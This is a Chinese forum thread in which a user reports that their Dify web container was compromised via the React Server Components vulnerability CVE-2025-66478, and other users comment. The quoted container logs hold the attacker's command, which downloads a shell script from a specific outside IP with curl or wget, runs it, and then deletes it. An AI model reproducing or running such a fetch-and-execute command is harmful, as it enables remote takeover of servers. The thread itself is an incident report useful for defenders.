从今天下午 4 点起,云服务器不断报警,下载了 xlg_amd64 、xlg.sh 、get.sh 等奇奇怪怪的脚本。 杀了过了一会又出现了,
最终定位到是 dify 的 web 容器执行的脚本。
一直没仔细看云平台上的告警:CVE-2025-66478 ( https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components )
dify issue 里显示修复了: https://github.com/langgenius/dify/issues/29202
但是晚上我升级到了 1.10.1-fix.1 ,发现还是有这个问题。。请示领导先关服务了。
脚本名字起得都如此凶戾。
14:29:16 0|dify-web | /bin/sh: curl: not found
14:29:16 0|dify-web | Connecting to 103.135.101.15 (103.135.101.15:80)
14:29:16 0|dify-web | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | rm: can't remove 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | ⨯ [Error: Command failed: curl http://103.135.101.15/wocaosinm.sh;wget http://103.135.101.15/wocaosinm.sh;sh wocaosinm.sh;rm -r wocaosinm.sh
14:29:16 0|dify-web | /bin/sh: curl: not found
14:29:16 0|dify-web | Connecting to 103.135.101.15 (103.135.101.15:80)
14:29:16 0|dify-web | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | rm: can't remove 'wocaosinm.sh': No such file or directory
 |
1
shukuang 13 小时 17 分钟前
默认配置下 React 服务器,通杀漏洞,升级版本是唯一解决途径
|
 |
2
laminux29 12 小时 10 分钟前
|
 |
3
levelworm 9 小时 29 分钟前
能不能发个脚本的代码让我们欣赏一下。
|
 |
4
rick13 5 小时 53 分钟前
笑死我了
|
 |
5
AmericanExpress 5 小时 52 分钟前 via iPhone
|
 |
6
dankai 3 小时 22 分钟前
这脚本名笑死🤣
|
 |
7
x86 3 小时 6 分钟前
命名丝毫不带藏的,笑死
|
 |
8
bingfengfeifei 2 小时 40 分钟前
lobechat 也中招了,这次这个影响范围感觉比之前的 log4j 漏洞大的多
|
 |
9
Wuuuu 1 小时 30 分钟前
很好奇,假如只用 react +其他后端,不用 nextjs ,是不是就没问题了……还是单纯 react 前端也受到影响了……
|
1 |
11
proxychains 1 小时 23 分钟前
笑死了
|
 |
12
Ketteiron 1 小时 21 分钟前
笑死了🤣可以评选今年最佳
|
 |
13
yefee 1 小时前
我们客户服务器也中招了
|
 |
14
crysislinux 31 分钟前 via Android
我们倒是没中这个,不过中了之前的供应链投毒。。大家 npm 还是切记要 ignore scripts ,。
|
Select Language